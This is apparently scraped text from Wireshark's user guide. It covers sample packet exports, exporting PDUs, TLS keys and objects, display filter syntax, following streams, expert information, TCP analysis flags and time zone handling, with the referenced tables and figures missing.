Time Source Destination Protocol Length SSID Info 1 0.000000 200.121.1.131 172.16.0.122 TCP 1454 10554 → 80 [ACK] Seq=1 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU] Frame 1: 1454 bytes on wire (11632 bits), 1454 bytes captured (11632 bits) Ethernet II, Src: 00:50:56:c0:00:01, Dst: 00:0c:29:42:12:13 Internet Protocol Version 4, Src: 200.121.1.131 (200.121.1.131), Dst: 172.16.0.122 (172.16.0.122) 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5) Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT) Total Length: 1440 Identification: 0x0141 (321) Flags: 0x0000 ...0 0000 0000 0000 = Fragment offset: 0 Time to live: 106 Protocol: TCP (6) Header checksum: 0xd390 [validation disabled] [Header checksum status: Unverified] Source: 200.121.1.131 (200.121.1.131) Destination: 172.16.0.122 (172.16.0.122) [Source GeoIP: PE, ASN 6147, Telefonica del Peru S.A.A.] Transmission Control Protocol, Src Port: 10554, Dst Port: 80, Seq: 1, Ack: 1, Len: 1400 CSV. "No.","Time","Source","Destination","Protocol","Length","SSID","Info","Win Size" "1","0.000000","200.121.1.131","172.16.0.122","TCP","1454","","10554 > 80 [ACK] Seq=1 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" "2","0.000011","172.16.0.122","200.121.1.131","TCP","54","","[TCP ACKed unseen segment] 80 > 10554 [ACK] Seq=1 Ack=11201 Win=53200 Len=0","53200" "3","0.025738","200.121.1.131","172.16.0.122","TCP","1454","","[TCP Spurious Retransmission] 10554 > 80 [ACK] Seq=1401 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" "4","0.025749","172.16.0.122","200.121.1.131","TCP","54","","[TCP Window Update] [TCP ACKed unseen segment] 80 > 10554 [ACK] Seq=1 Ack=11201 Win=63000 Len=0","63000" "5","0.076967","200.121.1.131","172.16.0.122","TCP","1454","","[TCP Previous segment not captured] [TCP Spurious Retransmission] 10554 > 80 [ACK] Seq=4201 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" JSON. 
{ "_index": "packets-2014-06-22", "_type": "doc", "_score": null, "_source": { "layers": { "frame": { "frame.encap_type": "1", "frame.time": "Jun 22, 2014 13:29:41.834477000 PDT", "frame.offset_shift": "0.000000000", "frame.time_epoch": "1403468981.834477000", "frame.time_delta": "0.450535000", "frame.time_delta_displayed": "0.450535000", "frame.time_relative": "0.450535000", "frame.number": "2", "frame.len": "86", "frame.cap_len": "86", "frame.marked": "0", "frame.ignored": "0", "frame.protocols": "eth:ethertype:ipv6:icmpv6", "frame.coloring_rule.name": "ICMP", "frame.coloring_rule.string": "icmp || icmpv6" }, "eth": { "eth.dst": "33:33:ff:9e:e3:8e", "eth.dst_tree": { "eth.dst_resolved": "33:33:ff:9e:e3:8e", "eth.dst.oui": "3355647", "eth.addr": "33:33:ff:9e:e3:8e", "eth.addr_resolved": "33:33:ff:9e:e3:8e", "eth.addr.oui": "3355647", "eth.dst.lg": "1", "eth.lg": "1", "eth.dst.ig": "1", "eth.ig": "1" }, "eth.src": "00:01:5c:62:8c:46", "eth.src_tree": { "eth.src_resolved": "00:01:5c:62:8c:46", "eth.src.oui": "348", "eth.src.oui_resolved": "Cadant Inc.", "eth.addr": "00:01:5c:62:8c:46", "eth.addr_resolved": "00:01:5c:62:8c:46", "eth.addr.oui": "348", "eth.addr.oui_resolved": "Cadant Inc.", "eth.src.lg": "0", "eth.lg": "0", "eth.src.ig": "0", "eth.ig": "0" }, "eth.type": "0x000086dd" }, "ipv6": { "ipv6.version": "6", "ip.version": "6", "ipv6.tclass": "0x00000000", "ipv6.tclass_tree": { "ipv6.tclass.dscp": "0", "ipv6.tclass.ecn": "0" }, "ipv6.flow": "0x00000000", "ipv6.plen": "32", "ipv6.nxt": "58", "ipv6.hlim": "255", "ipv6.src": "2001:558:4080:16::1", "ipv6.addr": "2001:558:4080:16::1", "ipv6.src_host": "2001:558:4080:16::1", "ipv6.host": "2001:558:4080:16::1", "ipv6.dst": "ff02::1:ff9e:e38e", "ipv6.addr": "ff02::1:ff9e:e38e", "ipv6.dst_host": "ff02::1:ff9e:e38e", "ipv6.host": "ff02::1:ff9e:e38e", "ipv6.geoip.src_summary": "US, ASN 7922, Comcast Cable Communications, LLC", "ipv6.geoip.src_summary_tree": { "ipv6.geoip.src_country": "United States", 
"ipv6.geoip.country": "United States", "ipv6.geoip.src_country_iso": "US", "ipv6.geoip.country_iso": "US", "ipv6.geoip.src_asnum": "7922", "ipv6.geoip.asnum": "7922", "ipv6.geoip.src_org": "Comcast Cable Communications, LLC", "ipv6.geoip.org": "Comcast Cable Communications, LLC", "ipv6.geoip.src_lat": "37.751", "ipv6.geoip.lat": "37.751", "ipv6.geoip.src_lon": "-97.822", "ipv6.geoip.lon": "-97.822" } }, "icmpv6": { "icmpv6.type": "135", "icmpv6.code": "0", "icmpv6.checksum": "0x00005b84", "icmpv6.checksum.status": "1", "icmpv6.reserved": "00:00:00:00", "icmpv6.nd.ns.target_address": "2001:558:4080:16:be36:e4ff:fe9e:e38e", "icmpv6.opt": { "icmpv6.opt.type": "1", "icmpv6.opt.length": "1", "icmpv6.opt.linkaddr": "00:01:5c:62:8c:46", "icmpv6.opt.src_linkaddr": "00:01:5c:62:8c:46" } } } } } ] Export the bytes selected in the “Packet Bytes” pane into a raw binary file. The “Export PDUs to File…” dialog box allows you to filter the captured Protocol Data Units (PDUs) and export them into a file. It allows you to export reassembled PDUs, avoiding lower layers such as TCP (e.g. HTTP without TCP), and decrypted PDUs without the lower protocols (e.g. HTTP without TLS and TCP). In the main menu select File → Export PDUs to File…. Wireshark will open the corresponding dialog shown in Figure 5.13, “Export PDUs to File window”. You can set a filter in the Display Filter field. For more information about filter syntax, see the Wireshark Filters man page. In the field below the Display Filter field you can choose the level from which you want to export the PDUs to the file. There are seven levels: DLT User. You can export a protocol that is framed in the user data link type table without the need to reconfigure the DLT user table. For more information, see the How to Dissect Anything page. DVB-CI. You can use it for the Digital Video Broadcasting (DVB) protocol. Logcat and Logcat Text. You can use them for the Android logs. OSI layer 3. You can use it to export PDUs encapsulated in the IPSec or SCTP protocols. OSI layer 4.
You can use it to export PDUs encapsulated in the TCP or UDP protocols. OSI layer 7. You can use it to export the following protocols: CredSSP over TLS, Diameter, protocols encapsulated in TLS and DTLS, H.248, Megaco, RELOAD framing, SIP, SMPP. Transport Layer Security (TLS) encrypts the communication between a client and a server. The most common use for it is web browsing via HTTPS. Decryption of TLS traffic requires TLS secrets. You can get them in the form of stored session keys in a “key log file”, or by using an RSA private key file. For more details, see the TLS wiki page. The File → Export TLS Session Keys… menu option generates a new “key log file” which contains the TLS session secrets known by Wireshark. This feature is useful if you typically decrypt TLS sessions using the RSA private key file. The RSA private key is very sensitive because it can be used to decrypt other TLS sessions and impersonate the server. Session keys can be used only to decrypt sessions from the packet capture file, so they are the safer mechanism for sharing with others. To export captured TLS session keys, follow the steps below: In the main menu select File → Export TLS Session Keys…. Wireshark will open the corresponding dialog shown in Figure 5.14, “Export TLS Session Keys window”. Type the desired file name in the Save As field and choose the destination folder in the Where field. This feature scans through the selected protocol’s streams in the currently open capture file or running capture and allows the user to export reassembled objects to the disk. For example, if you select HTTP, you can export HTML documents, images, executables, and any other files transferred over HTTP to the disk. If you have a capture running, this list is automatically updated every few seconds with any new objects seen. The saved objects can then be opened or examined independently of Wireshark. Columns: Filename: The filename for this object. Each protocol generates the filename differently. For example, HTTP uses the final part of the URI and IMF uses the subject of the email.
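The HTTP naming rule just described (the final part of the URI) can be mimicked in a few lines. This is an illustration with a made-up URL, not Wireshark's actual implementation.

```python
from urllib.parse import urlparse

# Illustration of the filename rule described above: take the final
# path component of the HTTP request URI as the exported object's name.
def http_object_filename(uri):
    path = urlparse(uri).path
    return path.rsplit("/", 1)[-1]

# Hypothetical request URI:
print(http_object_filename("http://example.com/images/logo.png"))  # logo.png
```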
Table of Contents Selecting a field, such as the acknowledgment number in the TCP header, shows it in the byte view as the selected bytes. You can also select and view packets the same way while Wireshark is capturing if you selected “Update list of packets in real time” in the “Capture Preferences” dialog box. In addition, you can view individual packets in a separate window as shown in Figure 6.2, “Viewing a packet in a separate window”. You can do this by double-clicking on an item in the packet list, or by selecting the packet in which you are interested in the packet list pane and selecting View → Show Packet in New Window. This allows you to easily compare two or more packets, even across multiple files. Along with double-clicking the packet list and using the main menu, there are a number of other ways to open a new packet window: You can open a pop-up menu over the “Packet List”, its column heading, “Packet Details”, or “Packet Bytes” by clicking your right mouse button on the corresponding item. The following table gives an overview of which functions are available in this header, where to find the corresponding function in the main menu, and a description of each item. The following table gives an overview of which functions are available in this pane, where to find the corresponding function in the main menu, and a short description of each item. The following table gives an overview of which functions are available in this pane, where to find the corresponding function in the main menu, and a short description of each item. Wireshark provides a display filter language that enables you to precisely control which packets are displayed. Display filters can be used to check for the presence of a protocol or field, the value of a field, or even compare two fields to each other. These comparisons can be combined with logical operators, like "and" and "or", and parentheses into complex expressions. The following sections will go into the display filter functionality in more detail.
The simplest display filter is one that displays a single protocol. To only display packets containing a particular protocol, type the protocol into Wireshark’s display filter toolbar. For example, to only display TCP packets, type tcp into Wireshark’s display filter toolbar. Similarly, to only display packets containing a particular field, type the field into Wireshark’s display filter toolbar. For example, to only display HTTP requests, type http.request into Wireshark’s display filter toolbar. You can filter on any protocol that Wireshark supports. You can also filter on any field that a dissector adds to the tree view, if the dissector has added an abbreviation for that field. A full list of the available protocols and fields is available through the menu item View → Internals → Supported Protocols. You can build display filters that compare values using a number of different comparison operators. For example, to only display packets to or from the IP address 192.168.0.1, use ip.addr==192.168.0.1. A complete list of available comparison operators is shown in Table 6.5, “Display Filter comparison operators”. All protocol fields have a type. Display Filter Field Types provides a list of the types with examples of how to use them in display filters. Display Filter Field Types Can be 8, 16, 24, 32, or 64 bits. You can express integers in decimal, octal, or hexadecimal. The following display filters are equivalent: ip.len le 1500 ip.len le 02734 ip.len le 0x5dc Can be 1 (for true), or 0 (for false). A Boolean field is present whether its value is true or false. For example, tcp.flags.syn is present in all TCP packets containing the flag, whether the SYN flag is 0 or 1. To only match TCP packets with the SYN flag set, you need to use tcp.flags.syn == 1.
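The three equivalent ip.len filters above all denote the value 1500 in different radixes, which is easy to verify with plain arithmetic:

```python
# The decimal, octal, and hexadecimal forms above all denote 1500.
assert int("2734", 8) == 1500    # 02734 in octal
assert int("5dc", 16) == 1500    # 0x5dc in hexadecimal
print(int("2734", 8), int("5dc", 16))  # 1500 1500
```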
6 bytes separated by a colon (:), dot (.), or dash (-) with one or two bytes between separators: eth.dst == ff:ff:ff:ff:ff:ff eth.dst == ff-ff-ff-ff-ff-ff eth.dst == ffff.ffff.ffff ip.addr == 192.168.0.1 Classless InterDomain Routing (CIDR) notation can be used to test if an IPv4 address is in a certain subnet. For example, this display filter will find all packets in the 129.111 Class-B network: ip.addr == 129.111.0.0/16 ipv6.addr == ::1 As with IPv4 addresses, IPv6 addresses can match a subnet. http.request.uri == "" udp contains 81:60:03 The display filter above matches packets that contain the 3-byte sequence 0x81, 0x60, 0x03 anywhere in the UDP header or payload. sip.To contains "a1762" The display filter above matches packets where the SIP To-header contains the string "a1762" anywhere in the header. http.host matches "acme\.(org|com|net)" The display filter above matches HTTP packets where the HOST header contains acme.org, acme.com, or acme.net. Comparisons are case-insensitive. tcp.flags & 0x02 That display filter will match all packets that contain the “tcp.flags” field with the 0x02 bit, i.e. the SYN bit, set. You can combine filter expressions in Wireshark using the logical operators shown in Table 6.6, “Display Filter Logical Operations” Wireshark allows you to select a subsequence of a sequence in rather elaborate ways. After a label you can place a pair of brackets [] containing a comma separated list of range specifiers. eth.src[0:3] == 00:00:83 The example above uses the n:m format to specify a single range. In this case n is the beginning offset and m is the length of the range being specified. eth.src[1-2] == 00:83 The example above uses the n-m format to specify a single range. In this case n is the beginning offset and m is the ending offset. eth.src[:4] == 00:00:83:00 The example above uses the :m format, which takes everything from the beginning of a sequence to offset m.
It is equivalent to 0:m eth.src[4:] == 20:20 The example above uses the n: format, which takes everything from offset n to the end of the sequence. eth.src[2] == 83 The example above uses the n format to specify a single range. In this case the single element at offset n is selected; this is equivalent to n:1. A comma-separated list of range specifiers can be combined to form compound ranges. Wireshark allows you to test a field for membership in a set of values or fields. After the field name, use the in operator followed by the set items surrounded by braces {}. For example, to display packets with a TCP source or destination port of 80, 443, or 8080, you can use tcp.port in {80 443 8080}. The set of values can also contain ranges: tcp.port in {443 4430..4434}. Sets are not just limited to numbers; other types can be used as well: http.request.method in {"HEAD" "GET"} ip.addr in {10.0.0.5 .. 10.0.0.9 192.168.1.1..192.168.1.9} frame.time_delta in {10 .. 10.5} The display filter language has a number of functions to convert fields, see Table 6.7, “Display Filter Functions”. The upper and lower functions can be used to force case-insensitive matches: lower(http.server) contains "apache". To find HTTP requests with long request URIs: len(http.request.uri) > 100. Note that the len function yields the string length in bytes rather than (multi-byte) characters. Usually an IP frame has only two addresses (source and destination), but in case of ICMP errors or tunneling, a single packet might contain even more addresses. These packets can be found with count(ip.addr) > 2. The string function converts a field value to a string, suitable for use with operators like "matches" or "contains". Integer fields are converted to their decimal representation. It can be used with IP/Ethernet addresses (as well as others), but not with string or byte fields.
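The range-specifier forms above can be mimicked on a Python bytes object. Note that Wireshark's n:m means offset n and length m, unlike Python's start:stop slices, so each form is translated explicitly below, using the address 00:00:83:00:20:20 implied by the eth.src examples.

```python
# MAC address 00:00:83:00:20:20 as bytes, to mimic eth.src range specifiers.
src = bytes.fromhex("000083002020")

# n:m -> offset n, length m (Wireshark), i.e. Python src[n:n+m]
assert src[0:0 + 3] == bytes.fromhex("000083")   # eth.src[0:3] == 00:00:83

# n-m -> offsets n through m inclusive, i.e. Python src[n:m+1]
assert src[1:2 + 1] == bytes.fromhex("0083")     # eth.src[1-2] == 00:83

# :m -> from the start up to offset m
assert src[:4] == bytes.fromhex("00008300")      # eth.src[:4] == 00:00:83:00

# n: -> from offset n to the end
assert src[4:] == bytes.fromhex("2020")          # eth.src[4:] == 20:20

# n -> the single element at offset n (equivalent to n:1)
assert src[2] == 0x83                            # eth.src[2] == 83
print("all range forms check out")
```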
For example, to match odd frame numbers: string(frame.number) matches "[13579]$" To match IP addresses ending in 255 in a block of subnets (172.16 to 172.31): string(ip.dst) matches "^172\.(1[6-9]|2[0-9]|3[0-1])\..{1,3}\.255" Using the != operator on combined expressions like eth.addr, ip.addr, tcp.port, and udp.port will probably not work as expected. Wireshark will show the warning “"!=" may have unexpected results” when you use it. People often use a filter string like ip.addr == 1.2.3.4 to display all packets containing the IP address 1.2.3.4. Then they use ip.addr != 1.2.3.4 expecting to see all packets not containing the IP address 1.2.3.4 in it. Unfortunately, this does not do the expected. Instead, that expression will even be true for packets where either the source or destination IP address equals 1.2.3.4. The reason for this is that the expression ip.addr != 1.2.3.4 is read as “the packet contains a field named ip.addr with a value different from 1.2.3.4”. As an IP datagram contains both a source and a destination address, the expression evaluates to true whenever at least one of the two addresses differs from 1.2.3.4. As protocols evolve they sometimes change names or are superseded by newer standards. For example, DHCP extends and has largely replaced BOOTP, and TLS has replaced SSL. If a protocol dissector originally used the older names and fields for a protocol, the Wireshark development team might update it to use the newer names and fields. In such cases they will add an alias from the old protocol name to the new one in order to make the transition easier. For example, the DHCP dissector was originally developed for the BOOTP protocol, but as of Wireshark 3.0 all of the “bootp” display filter fields have been renamed to their “dhcp” equivalents. You can still use the old filter names for the time being, e.g. “bootp.type” is equivalent to “dhcp.type”, but Wireshark will show the warning “"bootp" is deprecated” when you use it. Support for the deprecated fields may be removed in the future. You can create pre-defined filters that appear in the capture and display filter bookmark menus. This can save time in remembering and retyping some of the more complex filters you use.
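The two matches patterns above can be exercised with Python's re module, which accepts the same expressions. This is a plain approximation: Wireshark's matches operator is case-insensitive by default, which does not matter for these digit-only patterns.

```python
import re

# Odd frame numbers: the decimal representation ends in 1, 3, 5, 7, or 9.
odd = re.compile(r"[13579]$")
print(bool(odd.search(str(13))))   # True
print(bool(odd.search(str(20))))   # False

# IPv4 addresses ending in 255 within 172.16.0.0 - 172.31.255.255.
block = re.compile(r"^172\.(1[6-9]|2[0-9]|3[0-1])\..{1,3}\.255")
print(bool(block.search("172.16.4.255")))   # True
print(bool(block.search("172.32.4.255")))   # False: 32 outside 16-31
print(bool(block.search("172.20.9.254")))   # False: does not end in 255
```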
To create or edit capture filters, select Manage Capture Filters from the capture filter bookmark menu or Capture → Capture Filters… from the main menu. Display filters can be created or edited by selecting Manage Display Filters from the display filter bookmark menu or Analyze → Display Filters… from the main menu. Wireshark will open the corresponding dialog as shown in Figure 6.9, “The “Capture Filters” and “Display Filters” dialog boxes”. The two dialogs look and work similarly to one another. Both are described here, and the differences are noted as needed. Adds a new filter to the list. You can edit the filter name or expression by double-clicking on it. The filter name is used in this dialog to identify the filter for your convenience and is not used elsewhere. You can create multiple filters with the same name, but this is not very useful. When typing in a filter string, the background color will change depending on the validity of the filter, similar to the main capture and display filter toolbars. You can define a filter macro with Wireshark and label it for later use. This can save time in remembering and retyping some of the more complex filters you use. To define and save your own filter macros, follow the steps below: In the main menu select Analyze → Display Filter Macros…. Wireshark will open the corresponding dialog shown in Figure 6.10, “Display Filter Macros window”. Enter the name of your macro in the Name column. Enter your filter macro in the Text column. You can easily find packets once you have captured some packets or have read in a previously saved capture file. Simply select Edit → Find Packet… in the main menu. Wireshark will open a toolbar between the main toolbar and the packet list, shown in Figure 6.11, “The “Find Packet” toolbar”. You can search using the following criteria: Enter a display filter string into the text entry field and click the Find button. For example, to find the three-way handshake for a connection from host 192.168.0.1, use the following filter string: ip.src==192.168.0.1 and tcp.flags.syn==1 The value to be found will be syntax checked while you type it in.
If the syntax check of your value succeeds, the background of the entry field will turn green; if it fails, it will turn red. For more details see Section 6.3, “Filtering Packets While Viewing”. For example, use “ef:bb:bf” to find the next packet that contains the UTF-8 byte order mark. You can easily jump to specific packets with one of the menu items in the Go menu. Go back in the packet history works much like the page history in most web browsers. Go forward in the packet history works much like the page history in most web browsers. This toolbar can be opened by selecting Go → Go to Packet… from the main menu. It appears between the main toolbar and the packet list, similar to the ”Find Packet” toolbar. When you enter a packet number and press Return, Wireshark will jump to that packet. If a protocol field is selected which points to another packet in the capture file, this command will jump to that packet. As these protocol fields now work like links (just as in your Web browser), it’s easier to simply double-click on the field to jump to the corresponding field.

You can mark packets in the “Packet List” pane. A marked packet will be shown with a black background, regardless of the coloring rules set. Marking a packet can be useful for finding it later while analyzing a large capture file. Marked packet information is not stored in the capture file or anywhere else. It will be lost when the capture file is closed. You can use packet marking to control the output of packets when saving, exporting, or printing. To do so, an option in the packet range is available, see Section 5.9, “The “Packet Range” Frame”. There are several ways to mark and unmark packets. From the Edit menu you can select from the following: You can also mark and unmark a packet by clicking on it in the packet list with the middle mouse button. You can ignore packets in the “Packet List” pane. Wireshark will then pretend that they do not exist in the capture file.
An ignored packet will be shown with a white background and gray foreground, regardless of the coloring rules set. Ignored packet information is not stored in the capture file or anywhere else. It will be lost when the capture file is closed. There are several ways to ignore and unignore packets. From the Edit menu you can select from the following: While packets are captured, each packet is timestamped. These timestamps will be saved to the capture file, so they will be available for later analysis. A detailed description of timestamps, time zones and the like can be found in Section 7.6, “Time Stamps”. The timestamp presentation format and the precision in the packet list can be chosen using the View menu, see Figure 3.5, “The “View” Menu”. The available presentation formats are: The available precisions (i.e., the number of displayed decimal places) are: Time references can be set via the “Time Reference” items in the Edit menu or from the pop-up menu of the “Packet List” pane. See Section 3.6, “The “Edit” Menu”. A time referenced packet will be marked with the string *REF* in the Time column (see packet number 10). All subsequent packets will show the time since the last time reference.

It can be very helpful to see a protocol in the way that the application layer sees it. Perhaps you are looking for passwords in a Telnet stream, or you are trying to make sense of a data stream. Maybe you just need a display filter to show only the packets in a TLS or SSL stream. If so, Wireshark’s ability to follow protocol streams will be useful to you. To filter to a particular stream, select a TCP, UDP, DCCP, TLS, HTTP, HTTP/2, QUIC or SIP packet in the packet list of the stream/connection you are interested in and then select the menu item Analyze → Follow → TCP Stream (or use the context menu in the packet list).
Wireshark will set an appropriate display filter and display a dialog box with the data from the stream laid out, as shown in Figure 7.1, “The “Follow TCP Stream” dialog box”. The stream content is displayed in the same sequence as it appeared on the network. Non-printable characters are replaced by dots. Traffic from the client to the server is colored red, while traffic from the server to the client is colored blue. These colors can be changed by opening Edit → Preferences and, under Appearance → Font and Colors, selecting different colors for the client text and server text options. The stream content won’t be updated while doing a live capture. To get the latest content you’ll have to reopen the dialog. You can choose from the following actions: By default, Wireshark displays both client and server data. You can use the direction selector to switch between both, client to server, or server to client data. You can choose to view the data in one of the following formats: You can switch between streams using the “Stream” selector. You can search for text by entering it in the “Find” entry box and pressing Enter.

The HTTP/2 Stream dialog is similar to the “Follow TCP Stream” dialog, except for an additional “Substream” dialog field. HTTP/2 streams are identified by an HTTP/2 Stream Index (field name http2.streamid) which is unique within a TCP connection. The “Stream” selector determines the TCP connection, whereas the “Substream” selector is used to pick the HTTP/2 Stream ID. The QUIC protocol is similar: the first number selects the UDP stream index while the “Substream” field selects the QUIC Stream ID. A SIP call is shown with the same dialog, but the filter is based on the sip.Call-ID field. The count of streams is fixed to 0 and the field is disabled. If a selected packet field does not show all the bytes (i.e., they are truncated when displayed), or if they are shown as bytes rather than a string, or if they require more formatting because they contain an image or HTML, then this dialog can be used.
This dialog can also be used to decode field bytes from base64, zlib compressed or quoted-printable and show the decoded bytes as configurable output. It’s also possible to select a subset of bytes by setting the start byte and end byte. You can choose from the following actions: You can choose to decode the data from one of the following formats: You can choose to view the data in one of the following formats: You can search for text by entering it in the “Find” entry box and pressing Enter.

Wireshark keeps track of any anomalies and other items of interest it finds in a capture file and shows them in the Expert Information dialog. The goal is to give you a better idea of uncommon or notable network behaviour and to let novice and expert users find network problems faster than manually scanning through the packet list. The amount of expert information largely depends on the protocol being used. While dissectors for some common protocols like TCP and IP will show detailed information, other dissectors will show little or none. The following describes the components of a single expert information entry along with the expert user interface. Expert information entries are grouped by severity level (described below) and contain the following: Every expert information item has a severity level. The following levels are used, from lowest to highest. Wireshark marks them using different colors, which are shown in parentheses: Along with severity levels, expert information items are categorized by group. The following groups are currently implemented: It’s possible that more groups will be added in the future. You can open the expert info dialog by selecting Analyze → Expert Information or by clicking the expert level indicator in the main status bar. Right-clicking on an item will allow you to apply or prepare a filter based on the item, copy its summary text, and perform other tasks.
You can choose from the following actions: The packet detail tree marks fields with expert information based on their severity level color, e.g. “Warning” severities have a yellow background. This color is propagated to the top-level protocol item in the tree in order to make it easy to find the field that created the expert information. For the example screenshot above, the IP “Time to live” value is very low (only 1), so the corresponding protocol field is marked with a cyan background. To make it easier to find that item in the packet tree, the IP protocol top-level item is marked cyan as well. An optional “Expert Info Severity” packet list column is available that displays the most significant severity of a packet or stays empty if everything seems OK. This column is not displayed by default but can be easily added using the Preferences Columns page described in Section 11.5, “Preferences”.

By default, Wireshark’s TCP dissector tracks the state of each TCP session and provides additional information when problems or potential problems are detected. Analysis is done once for each TCP packet when a capture file is first opened. Packets are processed in the order in which they appear in the packet list. You can enable or disable this feature via the “Analyze TCP sequence numbers” TCP dissector preference. For analysis of data or protocols layered on top of TCP (such as HTTP), see Section 7.8.3, “TCP Reassembly”. TCP Analysis flags are added to the TCP protocol tree under “SEQ/ACK analysis”. Each flag is described below. Terms such as “next expected sequence number” and “next expected acknowledgement number” refer to the following: Set when the expected next acknowledgement number is set for the reverse direction and it’s less than the current acknowledgement number. Set when all of the following are true: Set when all of the following are true: Supersedes “Out-Of-Order” and “Retransmission”.
Set when the segment size is zero or one, the current sequence number is one byte less than the next expected sequence number, and none of SYN, FIN, or RST are set. Supersedes “Fast Retransmission”, “Out-Of-Order”, “Spurious Retransmission”, and “Retransmission”. Set when all of the following are true: Supersedes “Dup ACK” and “ZeroWindowProbeAck”. Set when all of the following are true: Supersedes “Retransmission”. Set when the SYN flag is set (not SYN+ACK), we have an existing conversation using the same addresses and ports, and the sequence number is different than the existing conversation’s initial sequence number. Set when the current sequence number is greater than the next expected sequence number. Checks for a retransmission based on analysis data in the reverse direction. Set when all of the following are true: Supersedes “Fast Retransmission”, “Out-Of-Order”, and “Retransmission”. Set when all of the following are true: Set when the segment size is non-zero, we know the window size in the reverse direction, and our segment size exceeds the window size in the reverse direction. Set when all of the following are true. In some specific cases this is normal — for example, a printer might use a zero window to pause the transmission of a print job while it loads or reverses a sheet of paper. However, in most cases this indicates a performance or capacity problem on the receiving end. It might take a long time (sometimes several minutes) to resume a paused connection, even if the underlying condition that caused the zero window clears up quickly. Set when the sequence number is equal to the next expected sequence number, the segment size is one, and the last-seen window size in the reverse direction was zero. If the single data byte from a Zero Window Probe is dropped by the receiver (not ACKed), then a subsequent segment should not be flagged as retransmission if all of the following conditions are true for that segment: * The segment size is larger than one.
* The next expected sequence number is one less than the current sequence number. This affects “Fast Retransmission”, “Out-Of-Order”, or “Retransmission”. Set when all of the following are true: Supersedes “TCP Dup ACK”. Some captures are quite difficult to analyze automatically, particularly when the time frame may cover both Fast Retransmission and Out-Of-Order packets. A TCP preference allows you to switch the precedence of these two interpretations at the protocol level. TCP conversations are said to be complete when they have both opening and closing handshakes, independently of any data transfer. However, we might be interested in identifying complete conversations with some data sent, and we use the following bit values to build a filter value on the tcp.completeness field: For example, a conversation containing only a three-way handshake will be found with the filter 'tcp.completeness==7' (1+2+4), while a complete conversation with data transfer will be found with a longer filter, as closing a connection can be associated with FIN or RST packets, or even both: 'tcp.completeness==31 or tcp.completeness==47 or tcp.completeness==63'

Further time zone and DST information can be found online. If you work with people around the world it’s very helpful to set your computer’s time and time zone right. You should set your computer’s time and time zone in the correct sequence: This way you will tell your computer both the local time and also the time offset to UTC. Many organizations simply set the time zone on their servers and networking gear to UTC in order to make coordination and troubleshooting easier. You can use the Network Time Protocol (NTP) to automatically adjust your computer to the correct time, by synchronizing it to Internet NTP clock servers. NTP clients are available for all operating systems that Wireshark supports (and for a lot more). So what’s the relationship between Wireshark and time zones anyway?
Wireshark’s native capture file format (libpcap format), and some other capture file formats, such as the Windows Sniffer, *Peek, Sun snoop formats, and newer versions of the Microsoft Network Monitor and Network Instruments/Viavi Observer formats, save the arrival time of packets as UTC values. UN*X systems, and “Windows NT based” systems represent time internally as UTC. When Wireshark is capturing, no conversion is necessary. However, if the system time zone is not set correctly, the system’s UTC time might not be correctly set even if the system clock appears to display correct local time. When capturing, Npcap has to convert the time to UTC before supplying it to Wireshark. If the system’s time zone is not set correctly, that conversion will not be done correctly. Other capture file formats, such as the OOS-based Sniffer format and older versions of the Microsoft Network Monitor and Network Instruments/Viavi Observer formats, save the arrival time of packets as local time values. Internally to Wireshark, time stamps are represented in UTC. This means that when reading capture files that save the arrival time of packets as local time values, Wireshark must convert those local time values to UTC values. Wireshark in turn will display the time stamps always in local time. The displaying computer will convert them from UTC to local time and displays this (local) time. For capture files saving the arrival time of packets as UTC values, this means that the arrival time will be displayed as the local time in your time zone, which might not be the same as the arrival time in the time zone in which the packet was captured. 
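The UTC storage and local-time display conversion described here can be checked with Python's standard zoneinfo module (the date and zone names below are illustrative; a January date is used so no DST offsets apply):

```python
# A capture taken at 2 o'clock local time in Los Angeles (PST, UTC-8)
# is stored as UTC and later displayed in another time zone.
from datetime import datetime
from zoneinfo import ZoneInfo

captured = datetime(2023, 1, 15, 2, 0, tzinfo=ZoneInfo("America/Los_Angeles"))

# Stored in the capture file as UTC: 10 o'clock.
as_utc = captured.astimezone(ZoneInfo("UTC"))
print(as_utc.hour)  # 10

# Displayed on a machine in Berlin (CET, UTC+1): 11 o'clock.
in_berlin = captured.astimezone(ZoneInfo("Europe/Berlin"))
print(in_berlin.hour)  # 11
```

The same instant in time thus shows three different wall-clock values depending on where it is displayed, which is exactly the Los Angeles/Berlin scenario discussed below.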
For capture files saving the arrival time of packets as local time values, the conversion to UTC will be done using your time zone’s offset from UTC and DST rules, which means the conversion will not be done correctly; the conversion back to local time for display might cancel this error out, in which case the arrival time will be displayed as the local arrival time at which the packet was captured. For example, let’s assume that someone in Los Angeles captured a packet with Wireshark at exactly 2 o’clock local time and sends you this capture file. The capture file’s time stamp will be represented in UTC as 10 o’clock. You are located in Berlin and will see 11 o’clock on your Wireshark display. Now you have a phone call, video conference or Internet meeting with that person to talk about that capture file. As you are both looking at the displayed time on your local computers, the one in Los Angeles still sees 2 o’clock but you in Berlin will see 11 o’clock. The time displays are different because both Wireshark displays show the (different) local times at the same point in time. Conclusion: you usually need not worry about the date/time of the time stamp you are currently looking at unless you must make sure that the date/time is as expected. So, if you get a capture file from a different time zone and/or DST, you’ll have to find out the time zone/DST difference between the two local times and “mentally adjust” the time stamps accordingly. In any case, make sure that every computer in question has the correct time and time zone setting.

Network protocols often need to transport large chunks of data which are too large to fit into a single packet, so the data is split across several packets and recombined by the receiver. Wireshark calls this mechanism reassembly, although a specific protocol specification might use a different term for it (e.g. desegmentation, defragmentation, etc.). For some of the network protocols Wireshark knows of, a mechanism is implemented to find, decode and display these chunks of data.
